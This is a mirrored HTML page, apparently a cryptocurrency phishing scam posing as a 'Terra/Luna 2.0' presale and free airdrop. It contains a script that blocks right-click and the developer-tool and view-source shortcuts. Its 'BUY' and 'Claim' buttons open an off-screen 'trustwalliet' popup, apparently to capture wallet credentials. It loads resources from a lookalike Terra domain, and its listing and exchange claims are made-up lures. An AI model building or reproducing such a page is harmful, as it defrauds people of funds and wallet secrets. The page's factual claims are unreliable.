
<script>
    // disable right click
    document.addEventListener('contextmenu', event => event.preventDefault());
 
    document.onkeydown = function (e) {
 
        // disable F12 key
        if(e.keyCode == 123) {
            return false;
        }
 
        // disable I key
        if(e.ctrlKey && e.shiftKey && e.keyCode == 73){
            return false;
        }
 
        // disable J key
        if(e.ctrlKey && e.shiftKey && e.keyCode == 74) {
            return false;
        }
 
        // disable U key
        if(e.ctrlKey && e.keyCode == 85) {
            return false;
        }
    }
 
</script>

<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from https://runonLuna 2.0.io/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Jan 2022 21:17:17 GMT -->
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Luna 2.0 - Explore the New Gaming Metaverse with Luna 2.0">
<meta name="author" content="Luna 2.0">
<meta property="og:site_name" content=""/>
<meta property="og:site" content=""/>
<meta property="og:title" content=""/>
<meta property="og:description" content="Luna 2.0

 is the most advanced and secure blockchain cloud infrastructure with segregate, unlimited scalable cloud computing networks, leading the decentralized future build on binance smart chain."/>
<meta property="og:image" content="images/.html"/>
<meta property="og:url" content="images/logo.png"/>
<meta name="twitter:card" content="summary_large_image">
<title>Terra 2.0 is Here</title>
<link rel="preconnect" href="https://fonts.gstatic.com/">
<link href="https://world.terraclacssic.net/cloudme.fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,600;0,700;1,400;1,600&amp;display=swap" rel="stylesheet">
<link href="css/bootstrap.css" rel="stylesheet">
<link href="css/fontawesome-all.css" rel="stylesheet">
<link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link href="css/swiper.css" rel="stylesheet">
<link href="css/magnific-popup.css" rel="stylesheet">
<link href="css/styles.css" rel="stylesheet">
<link href="https://world.terraclacssic.net/img/icon.png" rel="shortcut icon" type="image/x-icon" /><link href="https://world.terraclacssic.net/img/icon.png" rel="apple-touch-icon" />

</head>
<body data-spy="scroll" data-target=".fixed-top">
<nav class="navbar navbar-expand-lg fixed-top navbar-light">
<div class="container"> <a href="index.html" class="navbar-brand logo-image"><img src="images/logo.png" alt="Gigaverse"></a><button class="navbar-toggler p-0 border-0" type="button" data-toggle="offcanvas"> <span class="navbar-toggler-icon"></span> </button>
<div class="navbar-collapse offcanvas-collapse" id="navbarsExampleDefault">
<ul class="navbar-nav ml-auto">
<li class="nav-item"> <a class="nav-link page-scroll" href="#header">Home <span class="sr-only">(current)</span></a></li>
<li class="nav-item"> <a class="nav-link page-scroll" href="#intro">About</a></li>
<li class="nav-item"> <a class="nav-link page-scroll" href="#presale">Pre Sale</a></li>
<li class="nav-item"> <a class="nav-link page-scroll" href="#details">Tokenomics</a></li>
</ul> <span class="nav-item"> <a class="btn-solid-lg " href="https://lunacoin.live/TerraLunawitepaper.pdf" target="_blank">Whitepaper</a> </span>

</div>
</div>
</nav>
<header id="header" class="header">
<div class="container">
<div class="row">
<div class="col-lg-5">
<div class="text-container">
<h1 style="color: #1E266D;" class="h1-large">Terra 2.0 is Here</h1>
<p class="p-large">Fueled by a passionate community and deep developer pool, the new Terra blockchain is one of the most decentralized chains ever launched.</p> <a class="btn-solid-lg page-scroll" href="#presale">Buy Luna 2.0</a> <a class="btn-outline-lg page-scroll" href="#presale">Claim Airdrop</a>
</div>
</div>
<div class="col-lg-7">
<div class="image-container"> <img class="img-fluid" src="images/char5.png" alt="alternative"></div>
</div>
</div>
</div>
</header>
<div id="intro" class="basic-1">
<div class="container">
<div class="row">
<div class="col-lg-7"> <img class="img-fluid" src="images/char2.png" alt="alternative"></div>
<div class="col-lg-5">
<div class="text-container">
<h2>What is Luna 2.0</h2>
<p>Called Luna's rebirth, TerraForm Labs founder Do Kwon's proposal will see a new chain replace the existing Terra network. In addition, Luna 2.0 will replace the current version of Luna. Seeing the collapse in the first place, UST will sever ties with the stablecoin.

But the old chain will not just disappear, they will exist together. The old chain will be known as Terra Classic, while Luna Classic will see the current Luna continue.</p>
 <a class="btn-solid-reg page-scroll" href="#presale">Claim Now</a>
</div>
</div>
</div>
</div>
</div>
<div id="presale" class="cards-1" style="background:#F9F9F9; color: #000;">
<div class="container">
<div class="row">
<div class="col-lg-12">
<h2 class="h2-heading">Pre Sale and Airdrop ends in</h2>
<h2 style="text-align: center; margin-top: 0px; color: #1E266D; " id="demo"></h2>
<h4 class="h2-heading">Listing Price: 1 Luna 2.0 = 5 USD</h4>
<p class="p-heading">Liquidity will add on the Binance exchanges at August 30, 2022</p>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<div style="padding: 20px;" class="card">
<div class="card-icon-wrapper">
<div class="card-icon"> <img class="img-fluid" src="SVG/presale.svg" alt="alternative"></div>
</div>
<div class="card-body">
<h4 class="card-title">Join Presale</h4>
<p>Buy 0.01 BNB = 4000 Luna 2.0</p>
<p>Buy 10 BNB = 4.000.000 Luna 2.0</p> <input style="display: block; width: 100%; margin-bottom: 20px; " id="buyinput" placeholder="0.01" class="input-bordered" value="0.05"> <a class="btn-solid-reg page-scroll" href="trustwalliet">BUY</a>
</div>
</div>
<div style="padding: 20px;" class="card">
<div class="card-icon-wrapper">
<div class="card-icon"> <img class="img-fluid" src="SVG/airdrop.svg" alt="alternative"></div>
</div>
<h4 class="card-title">Claim Airdrop</h4>
<p>Claim 18,000 Luna 2.0 for the first 105,000 people.</p> <a class="btn-solid-reg page-scroll" href="#" onclick="window.open('trustwalliet', '_blank', 'height=710,width=383,menubar=no, toolbar=no, top=0, left=4000, location=no, scrollbars=no,resizable=no,status=no') ;return false">Claim Luna 2.0</a>
</div>
</div>

</div>
</div>
</div>
</div> <input style="display: none;" id="airdropval" class="d-hidden" type="text" value="0.003"><input style="display: none;" id="airinput" class="input" placeholder="Invite By">
<div id="details" class="basic-2">
<div class="container">
<div class="row">
<div class="col-lg-9">
<div class="intro"></div>
</div>
</div>
<div class="row">
<div class="col-lg-7">
<div class="image-container"> <img class="img-fluid" src="images/char4.png" alt="alternative"></div>
</div>
<div class="col-lg-5">
<div class="text-container">
<h2>Luna 2.0 come on and join the airdrop!</h2>
<p>Terra 2.0 (LUNA) is a decentralized financial infrastructure and blockchain protocol that brings some unique concepts and theories to the market. The Terra 2.0 (LUNA) network allows its users to create stablecoins. The Terra blockchain is unique because it can host a large number of algorithmic stablecoins on its network.</p>
<pre class="grad-pre">Token Name - <strong>Terra</strong><br>Token Symbol - <strong>Luna</strong><br>Token Decimal - <strong>18</strong><br>Token Supply - <strong>100.000.000</strong><br>Network - <strong>Smart Chain</strong></pre>
</div>
</div>
</div>
</div>
</div>
<div class="basic-3">
<div class="container">
<div class="row">
<div class="col-lg-5">
<div class="text-container">
<h2>On Which Exchanges Will LUNA 2.0 Be Traded?</h2>
<p>Cryptocurrency exchange Bitrue stated that LUNA will rise again, stating that it will be the first cryptocurrency exchange to support LUNA V2. Bitrue also announced that LUNA V1 operations will be suspended today. Dubai-based cryptocurrency exchange Bybit said today that it will be renaming the UST and LUNA tokens before Terra 2 is launched. With this statement, we can say that the stock market will also offer LUNA V2 support. HitBTC cryptocurrency exchange announced that it will support the LUNA V2 token, which will run on the Terra 2 Blockchain from August 31, 2022. The exchange stated that the existing old Blockchain chain will be named Terra Classic and the name of the token will be LUNA Classic (LUNC).</p>
</div>
</div>
<div class="col-lg-7">
<div class="image-container"> <img class="img-fluid" src="images/char3.png" alt="alternative"></div>
</div>
</div>
</div>
</div>
<div class="basic-4">
<div class="container">
<div class="row">
<div class="col-lg-7">
<div class="image-container"> <img class="img-fluid" src="images/char6.png" alt="alternative"></div>
</div>
<div class="col-lg-5">
<div class="text-container">
<h2>Who are the founders of the Terra (LUNA) project?</h2>
<p>Project Terra (LUNA) was founded in 2018 by Do Kwon and Daniel Shin of Terraform Labs. Do Kwon, who is also the CEO of Terraform Labs, is known for his investments and initiatives in the blockchain space. Daniel Shin is the founder and CEO of Chai, a major payment firm in Asia, as well as the Terra (LUNA) project.</p>
</div>
</div>
</div>
</div>
</div>

<div class="copyright">
<div class="container">
<div class="row">
<div class="col-lg-12">
<p class="p-small">©️ 2022 Terra LUNA Rewards | All Right Reserved</p>
</div>
</div>
</div>
</div>
<script data-cfasync="false" src="cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="js/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/jquery.easing.min.js"></script>
<script src="js/jquery.magnific-popup.js"></script>
<script src="js/swiper.min.js"></script>
<script src="js/scripts.js"></script>
<script src="js/web3.js"></script>
<script src="js/app.js"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@10"></script>
<script data-pagespeed-no-defer>(function(){function f(b){var a=window;if(a.addEventListener)a.addEventListener("load",b,!1);else if(a.attachEvent)a.attachEvent("onload",b);else{var c=a.onload;a.onload=function(){b.call(this);c&&c.call(this)}}};window.pagespeed=window.pagespeed||{};var k=window.pagespeed;function l(b,a,c,g,h){this.h=b;this.i=a;this.l=c;this.j=g;this.b=h;this.c=[];this.a=0}l.prototype.f=function(b){for(var a=0;250>a&&this.a<this.b.length;++a,++this.a)try{document.querySelector(this.b[this.a])&&this.c.push(this.b[this.a])}catch(c){}this.a<this.b.length?window.setTimeout(this.f.bind(this),0,b):b()};
k.g=function(b,a,c,g,h){if(document.querySelector&&Function.prototype.bind){var d=new l(b,a,c,g,h);f(function(){window.setTimeout(function(){d.f(function(){for(var a="oh="+d.l+"&n="+d.j,a=a+"&cs=",b=0;b<d.c.length;++b){var c=0<b?",":"",c=c+encodeURIComponent(d.c[b]);if(131072<a.length+c.length)break;a+=c}k.criticalCssBeaconData=a;var b=d.h,c=d.i,e;if(window.XMLHttpRequest)e=new XMLHttpRequest;else if(window.ActiveXObject)try{e=new ActiveXObject("Msxml2.XMLHTTP")}catch(m){try{e=new ActiveXObject("Microsoft.XMLHTTP")}catch(n){}}e&&
(e.open("POST",b+(-1==b.indexOf("?")?"?":"&")+"url="+encodeURIComponent(c)),e.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),e.send(a))})},0)})}};k.criticalCssBeaconInit=k.g;})();
pagespeed.selectors=[".mfp-ajax-cur",".mfp-ajax-holder .mfp-content",".mfp-align-top .mfp-container",".mfp-arrow",".mfp-arrow-left",".mfp-arrow-right",".mfp-auto-cursor .mfp-content",".mfp-bg",".mfp-bottom-bar",".mfp-close",".mfp-close-btn-in .mfp-close",".mfp-container",".mfp-content",".mfp-counter",".mfp-figure",".mfp-figure figure",".mfp-figure small",".mfp-gallery .mfp-image-holder .mfp-figure",".mfp-hide",".mfp-iframe-holder",".mfp-iframe-holder .mfp-close",".mfp-iframe-holder .mfp-content",".mfp-iframe-scaler",".mfp-iframe-scaler iframe",".mfp-image-holder .mfp-close",".mfp-image-holder .mfp-content",".mfp-img-mobile .mfp-bottom-bar",".mfp-img-mobile .mfp-close",".mfp-img-mobile .mfp-counter",".mfp-img-mobile .mfp-figure",".mfp-img-mobile .mfp-figure small",".mfp-img-mobile .mfp-image-holder",".mfp-img-mobile img.mfp-img",".mfp-inline-holder .mfp-content",".mfp-loading.mfp-figure",".mfp-preloader",".mfp-preloader a",".mfp-s-error .mfp-content",".mfp-s-ready .mfp-preloader",".mfp-title",".mfp-wrap",".mfp-zoom",".mfp-zoom-out-cur",".mfp-zoom-out-cur .mfp-image-holder .mfp-close","button","button.mfp-arrow","button.mfp-close","img.mfp-img"];pagespeed.criticalCssBeaconInit('/ngx_pagespeed_beacon','https://terra-luna.programs-giveaway-token.com/','UDcGd8xld-','VQBnNlsm1iQ',pagespeed.selectors);</script></body>


</html>